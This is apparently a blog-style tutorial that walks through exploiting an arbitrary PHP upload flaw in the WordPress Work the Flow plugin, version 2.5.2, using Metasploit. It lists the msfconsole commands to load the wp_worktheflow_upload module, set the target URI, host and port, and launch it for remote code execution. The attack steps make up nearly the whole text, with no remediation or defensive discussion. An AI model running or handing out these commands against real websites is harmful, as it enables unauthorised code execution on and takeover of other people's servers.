Exploit WordPress using Work the Flow Upload Vulnerability

This module exploits an arbitrary PHP code upload in the WordPress Work the Flow plugin, version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution

 Exploit Targets

Work the Flow plugin, version 2.5.2.


Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_worktheflow_upload

msf exploit (wp_worktheflow_upload)>set targeturi /wordpress

msf exploit (wp_worktheflow_upload)>set rhost (IP of Remote Host)

msf exploit (wp_worktheflow_upload)>set rport 80

msf exploit (wp_worktheflow_upload)>exploit     

Leave a Reply

Your email address will not be published. Required fields are marked *